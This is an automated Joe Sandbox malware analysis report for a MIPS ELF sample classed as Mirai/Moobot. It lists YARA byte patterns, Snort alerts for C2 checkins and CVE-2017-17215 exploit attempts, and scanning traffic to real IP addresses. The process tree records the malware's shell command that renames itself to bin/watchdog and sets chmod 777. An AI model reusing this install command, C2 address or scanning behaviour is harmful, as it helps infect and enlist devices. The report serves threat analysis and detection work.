Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
8lsvVMbYw7.elf

Overview

General Information

Sample Name:8lsvVMbYw7.elf
Original Sample Name:4db30b3742977f4175543bcc258bba08.elf
Analysis ID:830708
MD5:4db30b3742977f4175543bcc258bba08
SHA1:d4934ed96152dfae36f4b9421b5f5b602f9ed6fe
SHA256:7e4dadf93fbb7a01b55eadacbb40ae8d5e95f5b9592e55f0fb2340d89fc78f17
Tags:32elfmipsmirai
Infos:

Detection

Mirai, Moobot
Score:92
Range:0 - 100
Whitelisted:false

Signatures

Yara detected Mirai
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Moobot
Snort IDS alert for network traffic
Connects to many ports of the same IP (likely port scanning)
Uses known network protocols on non-standard ports
Sets full permissions to files and/or directories
Yara signature match
Executes the "mkdir" command used to create folders
Uses the "uname" system call to query kernel version information (possible evasion)
Executes the "chmod" command used to modify permissions
Enumerates processes within the "proc" file system
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Detected TCP or UDP traffic on non-standard ports
Sample has stripped symbol table
Sample tries to set the executable flag
HTTP GET or POST without a user agent
Executes commands using a shell command-line interpreter
Executes the "rm" command used to delete files or directories
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Classification

Analysis Advice

Static ELF header machine description suggests that the sample might not execute correctly on this machine.
All HTTP servers contacted by the sample do not answer. The sample is likely an old dropper which does no longer work.
Static ELF header machine description suggests that the sample might only run correctly on MIPS or ARM architectures.

General Information

Joe Sandbox Version:37.0.0 Beryl
Analysis ID:830708
Start date and time:2023-03-20 16:19:55 +01:00
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 8m 2s
Hypervisor based Inspection enabled:false
Report type:light
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample file name:8lsvVMbYw7.elf
Original Sample Name:4db30b3742977f4175543bcc258bba08.elf
Detection:MAL
Classification:mal92.troj.linELF@0/0@2/0

Warnings

  • Report size exceeded maximum capacity and may have missing network information.
  • TCP Packets have been reduced to 100

Runtime Messages

Command:/tmp/8lsvVMbYw7.elf
PID:6211
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
done.
Standard Error:

Process Tree

  • system is lnxubuntu20
  • 8lsvVMbYw7.elf (PID: 6211, Parent: 6129, MD5: 0083f1f0e77be34ad27f849842bbb00c) Arguments: /tmp/8lsvVMbYw7.elf
    • sh (PID: 6213, Parent: 6211, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "rm -rf bin/watchdog && mkdir bin; >bin/watchdog && mv /tmp/8lsvVMbYw7.elf bin/watchdog; chmod 777 bin/watchdog"
      • sh New Fork (PID: 6215, Parent: 6213)
      • rm (PID: 6215, Parent: 6213, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf bin/watchdog
      • sh New Fork (PID: 6216, Parent: 6213)
      • mkdir (PID: 6216, Parent: 6213, MD5: 088c9d1df5a28ed16c726eca15964cb7) Arguments: mkdir bin
      • sh New Fork (PID: 6217, Parent: 6213)
      • mv (PID: 6217, Parent: 6213, MD5: 504f0590fa482d4da070a702260e3716) Arguments: mv /tmp/8lsvVMbYw7.elf bin/watchdog
      • sh New Fork (PID: 6218, Parent: 6213)
      • chmod (PID: 6218, Parent: 6213, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod 777 bin/watchdog
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
NameDescriptionAttributionBlogpost URLsLink
MooBotNo Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.moobot

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
8lsvVMbYw7.elfJoeSecurity_MoobotYara detected MoobotJoe Security
    8lsvVMbYw7.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
      8lsvVMbYw7.elfLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
      • 0x11834:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x11848:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1185c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x11870:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x11884:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x11898:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x118ac:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x118c0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x118d4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x118e8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x118fc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x11910:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x11924:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x11938:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1194c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x11960:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x11974:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x11988:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1199c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x119b0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x119c4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      6211.1.00007f3790400000.00007f3790414000.r-x.sdmpJoeSecurity_MoobotYara detected MoobotJoe Security
        6211.1.00007f3790400000.00007f3790414000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
          6211.1.00007f3790400000.00007f3790414000.r-x.sdmpLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
          • 0x11834:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x11848:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1185c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x11870:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x11884:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x11898:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x118ac:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x118c0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x118d4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x118e8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x118fc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x11910:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x11924:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x11938:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1194c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x11960:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x11974:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x11988:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1199c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x119b0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x119c4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          Process Memory Space: 8lsvVMbYw7.elf PID: 6211Linux_Trojan_Gafgyt_28a2fe0cunknownunknown
          • 0x5dce:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x5de2:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x5df6:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x5e0a:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x5e1e:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x5e32:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x5e46:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x5e5a:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x5e6e:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x5e82:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x5e96:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x5eaa:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x5ebe:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x5ed2:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x5ee6:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x5efa:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x5f0e:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x5f22:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x5f36:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x5f4a:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x5f5e:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F

          Snort Signatures

          Timestamp:192.168.2.2393.94.199.11953672372152835222 03/20/23-16:21:16.976524
          SID:2835222
          Source Port:53672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.2394.187.107.9039438372152835222 03/20/23-16:21:34.558345
          SID:2835222
          Source Port:39438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.23203.6.74.10537918372152835222 03/20/23-16:21:45.948271
          SID:2835222
          Source Port:37918
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.238.8.8.843281532023883 03/20/23-16:20:44.511900
          SID:2023883
          Source Port:43281
          Destination Port:53
          Protocol:UDP
          Classtype:Potentially Bad Traffic
          Timestamp:156.224.24.249192.168.2.2356999477962030489 03/20/23-16:21:24.722739
          SID:2030489
          Source Port:56999
          Destination Port:47796
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:156.224.24.249192.168.2.2356999478062030489 03/20/23-16:22:44.755597
          SID:2030489
          Source Port:56999
          Destination Port:47806
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.23197.234.43.11049508372152835222 03/20/23-16:22:30.124421
          SID:2835222
          Source Port:49508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.2341.36.73.5245328372152835222 03/20/23-16:21:23.129262
          SID:2835222
          Source Port:45328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.23156.224.24.24947806569992030490 03/20/23-16:21:34.964696
          SID:2030490
          Source Port:47806
          Destination Port:56999
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.23197.39.71.7358096372152835222 03/20/23-16:22:16.668019
          SID:2835222
          Source Port:58096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.2386.71.8.24242520372152835222 03/20/23-16:22:02.177570
          SID:2835222
          Source Port:42520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.23156.224.24.24947796569992030490 03/20/23-16:20:45.109110
          SID:2030490
          Source Port:47796
          Destination Port:56999
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.23192.107.143.15947896372152835222 03/20/23-16:22:19.853858
          SID:2835222
          Source Port:47896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.238.8.8.846438532023883 03/20/23-16:21:34.369876
          SID:2023883
          Source Port:46438
          Destination Port:53
          Protocol:UDP
          Classtype:Potentially Bad Traffic

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Multi AV Scanner detection for submitted file
          Source: 8lsvVMbYw7.elfVirustotal: Detection: 60%Perma Link
          Source: 8lsvVMbYw7.elfReversingLabs: Detection: 64%

          Networking

          barindex
          Snort IDS alert for network traffic
          Source: TrafficSnort IDS: 2023883 ET DNS Query to a *.top domain - Likely Hostile 192.168.2.23:43281 -> 8.8.8.8:53
          Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.23:47796 -> 156.224.24.249:56999
          Source: TrafficSnort IDS: 2030489 ET TROJAN ELF/MooBot Mirai DDoS Variant Server Response 156.224.24.249:56999 -> 192.168.2.23:47796
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:53672 -> 93.94.199.119:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:45328 -> 41.36.73.52:37215
          Source: TrafficSnort IDS: 2023883 ET DNS Query to a *.top domain - Likely Hostile 192.168.2.23:46438 -> 8.8.8.8:53
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:39438 -> 94.187.107.90:37215
          Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.23:47806 -> 156.224.24.249:56999
          Source: TrafficSnort IDS: 2030489 ET TROJAN ELF/MooBot Mirai DDoS Variant Server Response 156.224.24.249:56999 -> 192.168.2.23:47806
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:37918 -> 203.6.74.105:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:42520 -> 86.71.8.242:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:58096 -> 197.39.71.73:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:47896 -> 192.107.143.159:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:49508 -> 197.234.43.110:37215
          Connects to many ports of the same IP (likely port scanning)
          Source: global trafficTCP traffic: 197.9.164.30 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 157.160.77.243 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 191.61.231.41 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.6.41.68 ports 1,2,3,5,7,37215
          Uses known network protocols on non-standard ports
          Source: unknownNetwork traffic detected: HTTP traffic on port 53672 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 53672 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 53672 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 53672 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 53672 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 45328 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 45328
          Source: unknownNetwork traffic detected: HTTP traffic on port 53672 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 53672 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 39438 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37918 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37918 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 53672 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 42520 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 42520 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 42520 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 42520 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 42520 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 42520 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 58096 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 58096
          Source: unknownNetwork traffic detected: HTTP traffic on port 42520 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 47896 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 47896 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 47896 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 47896 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 53672 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 49508 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 42520 -> 37215
          Source: global trafficTCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
          Source: global trafficTCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
          Source: global trafficTCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 113.66.95.51:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 41.109.134.160:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 122.238.154.25:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 61.122.23.148:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 113.167.180.50:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 197.154.145.3:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 197.50.135.0:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 137.60.152.96:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 197.4.125.26:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 161.127.238.63:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 157.202.140.177:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 41.249.139.35:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 197.191.6.8:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 41.56.211.70:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 157.185.236.211:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 41.132.98.11:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 197.68.19.229:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 197.107.162.20:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 197.174.60.2:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 197.244.224.7:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 41.169.228.69:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 157.76.14.187:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 41.30.143.132:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 41.148.20.226:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 197.223.141.146:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 197.67.169.11:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 197.198.131.180:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 197.52.236.172:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 157.47.2.0:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 197.40.126.72:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 157.34.71.4:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 65.17.4.212:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 157.184.22.246:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 41.139.140.184:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 121.61.208.71:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 157.167.73.218:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 157.186.90.102:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 197.28.204.27:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 157.160.77.243:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 197.105.52.70:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 41.195.120.236:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 213.112.8.47:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 157.153.101.69:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 41.7.246.144:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 197.215.196.144:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 41.169.82.231:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 41.93.244.82:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 157.158.216.93:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 41.247.231.164:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 41.193.127.116:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 41.248.251.58:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 41.65.231.5:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 157.133.239.12:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 122.179.227.216:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 157.82.35.181:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 157.145.245.102:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 41.170.67.125:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 157.142.164.245:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 157.113.199.180:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 197.186.17.35:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 194.35.96.169:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 197.103.126.76:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 157.152.167.176:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 157.131.253.226:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 197.122.217.85:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 197.15.186.94:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 41.75.214.67:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 157.122.135.73:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 151.41.106.32:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 180.97.152.235:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 157.84.193.27:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 157.64.220.216:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 157.125.2.202:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 76.192.60.199:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 197.103.48.145:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 197.166.60.208:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 107.153.39.244:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 52.192.201.207:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 157.131.86.130:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 19.68.91.41:37215
